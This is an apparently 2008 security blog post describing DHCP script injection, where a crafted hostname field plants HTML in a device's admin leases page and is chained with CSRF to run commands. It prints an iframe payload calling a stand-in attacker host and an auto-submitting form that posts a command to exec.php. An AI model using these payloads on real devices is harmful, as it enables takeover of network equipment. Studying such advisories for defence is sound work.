usefulfor.com/security security dojo

4Aug/080

DHCP Script Injection

A number of administrative applications are available which allow users to manage a network DHCP server via a web interface. This allows administrators to set up configuration options and view active DHCP leases.

it was found that a large number of these administrative web applications did not properly sanitise parameters that were passed to them from the DHCP server and therefore an attacker. In particular, a specially crafted DHCPREQUEST message containing malicious JavaScript or HTML code in the DHCP Options Hostname field could be sent to the DHCP server; the malicious code would then be displayed in the DHCP active leases page of the vulnerable administrative application and would be executed when an administrator visited the page.

Circumstances

Device providing an administrative web interface with a DHCP management functionality.

Cause

The device administrative web interface does not properly sanitise parameters that are passed to it from the DHCP server.

Exploitation

If a specially crafted DHCPREQUEST message containing malicious code in the Hostname DHCP Options field is sent to the affected DHCP server; this will be displayed in the DHCP active leases page of the device administrative interface and will be executed when an administrator visits this page.

Impact

Administrative web interfaces normally have highly privileged access to operating system functions via in-built script. In combination with a CSRF technique an attacker could remotely execute commands in the affected system.

Dependencies

  • The attacker would have to be connected to the network segment on which the affected device was located.
  • The DHCP server would also need to be active and to provide the attacker’s system with an IP address.

Attack Technique

1. An attacker connected to the same wired network as the affected device could send a specially crafted DHCPREQUEST message containing a malicious payload in the DHCP Options Hostname field

<iframe height=0 width=0 src='http://attacker-web-server/'>

2. This payload would then be passed from the DHCP server to the admin web interface and executed when the DHCP active leases page was visited by an administrator

3. The malicious payload in the DHCP Options Hostname field references to a script hosted in the attacker's web server. Below it can be seen an example of the malicious script hosted in the attacker's web server. This code will vary depending on the affected device.

<html>
<body onload="javascript:document.forms.frmExecPlus.submit();">
<form name="frmExecPlus" action="https://target/exec.php" method="POST">
<input name="txtCommand" type="hyden" size="80" value="whoami">
<input type="hidden" value="Execute">
</form>
</body>

4. The malicious script hosted in the attacker's web server is used to perform a CSRF attack against the affected administrative interface. This script causes the administrator's browser to make a POST request to the command execution functionality (exec.php) and executes the desired command.

Tool: DHCP Script Injection [1]

Advisory: pfSense DHCP Script Injection Vulnerability [1] [2]

Demo: pfSense DHCP Script Injection Attack [1]

White paper: Behind Enemy Lines [1] [2]

Popularity: 17% [?]

Share and Enjoy:
  • Digg
  • del.icio.us
  • Slashdot
  • Technorati
  • Meneame
  • Twitter
Filed under: hack-fu Leave a comment
Comments (0) Trackbacks (3)

No comments yet.


Leave a comment


猪在笑 » Blog Archive » What’s new in web hacking techniques of 2008
Heuristic Delta :: Top 70 Hacking Methods :: http://blogs.heuristicdelta.com
Le migliori tecniche di Web Hacking del 2008 | lonerunners.net
« SSID Script Injection middleware and me (part 2) »

Popular Posts

Categories

Archive